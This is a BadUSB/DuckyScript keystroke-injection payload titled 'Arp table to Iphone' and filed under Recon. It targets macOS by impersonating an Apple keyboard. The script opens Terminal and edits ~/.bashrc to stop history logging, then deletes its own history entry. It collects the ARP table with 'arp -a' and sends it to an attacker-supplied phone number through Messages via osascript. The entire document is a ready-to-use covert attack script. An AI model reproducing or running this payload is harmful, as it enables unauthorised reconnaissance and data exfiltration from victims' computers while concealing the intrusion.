REM This script uses the "x=$(arp -a)" command to retrieve ARP table information.
REM Then it sends the information to your iPhone.
 

REM Shoutout to matthewkayne and 0iphor13 for the Phone code part.
REM Replace "Phone Number HERE" with your phone number to receive MacOs System information


REM Title: Arp table to Iphone
REM Author: NARSTY
REM Target: MacOS 
REM Version: 1.0
REM Category: Recon



ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER 
DELAY 500 
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING  x=$(arp -a); osascript -e 'tell application "Messages" to send "'"$x"'" to buddy "Phone Number HERE"'
DELAY 1000
ENTER
DELAY 5000 
GUI w
